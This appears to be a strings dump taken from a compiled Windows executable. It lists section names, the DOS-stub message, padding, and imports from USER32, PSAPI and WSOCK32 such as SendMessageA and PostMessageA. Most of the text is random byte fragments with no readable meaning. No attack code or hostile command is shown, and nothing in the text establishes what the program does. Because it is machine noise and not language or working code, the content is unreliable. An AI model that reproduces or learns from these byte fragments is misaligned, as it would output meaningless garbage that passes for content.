INGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
,paKW7
__p__commode
__p__fmode
Pi6e@K
[pLy*n
PostMessageA
PSAPI.DLL
pu	|1$\
&.puki	
PWXtu57z@>
pw\`"y:
P&xR[9t
p?xs9ob
;`Q0/$
]Q$3Lk[
Q5GNNi
%,|Q8<
_q)afI
qa-hH\
qBf(6"V
|Q_'cr
qDq!q	q
QEodVP
Qf_NO1
'qf$Vz
QHDq/O
%`	Qlv
*!QnY%"z
<,qPAz
QY$+]28
qYjLZ4
R4%Cb 
=rBnQk
rc	;%"
`.rdata
@.reloc
rewind
_r/FFdb
"r$hGOk
.r&jgP
-#rnJ%n
rPb=t\\2
[] Rq(
Rry:Xb
RTsBEZ
-:-s-C
\;Sd*z
SendMessageA
__set_app_type
_setmbcp
__setusermatherr
]sk'9ul
SLW ^p
sprintf
',$Sw,
SXpF8Yu,X~
.s)|,Z
S-z"Ep
szixY]5
'|t2OMT
' T6=	O}
t|~`8"
Tc]|6p^$
)T|e<],4
tEXtSoftware
T>fb$vF
TGJ7NXW
!This program cannot be run in DOS mode.
-Tj$r`
TK@`;x
TpQh@P{WKU=t
t'R!9]YB
{T&+smf
T$uAh,y
>t>xY|t
:t&y@+"
&TY;X$
~u2IEn
U{5u,mu
U8dHq:
*u#8q[Jq
+U`?8z
U9*R$r
'=uaeC
``+uB5
u?[ba%
_\ucDOe
u<ipw?n
u+	kb2
_uk/YW
!#U\NV
}[.u^p
(U=-^Q^
_Uqi{t
USER32.dll
US?s/`
uS	=y`
UxFbCF
V0N.?2
?V1$2<
"&V?|3GF
V_JN\]
vkV!cM
vL51 r
vm]ggQ
vNjF"#
V SSPh
	;+vtU
vux6RyQ8
w.",+0}
w!30',]**
W^3(JZ
w6O&I"
W8BUB0B&
~Wa+5|
wBwB&BB
Wd/O6y
_wfopen
W_"+gs
>wi>Ha
>wJf{ith$
!>WLL9W
+?`)wM|
/Wp:Dn
WPI=!#
^wSHc2
WSOCK32.dll
WUhU)`pWr
;Ww$q67
Wy/kv5
/*x4uz8
_XcptFilter
X"GYGBiU
]x,`Jch
<?xpacket begin="
xpr,2+
:x.W5&
XyK%hlyZ{
YB~"t=!
|Y[*DAl
`yE*.Up
]-yhC {
Y}"T|`
y$>w<1jz
yxDQVf
y#zV|#
Z+1!ZF
!zaX\L
z%(C,&@
Z=cT2#
z&dLo*
z?(e?<
Z+F,c'l<@^'
;(z$HfDo
*zHyVt
zO#X6T
Z?R)fU
/Z T,99rS
zV2tw: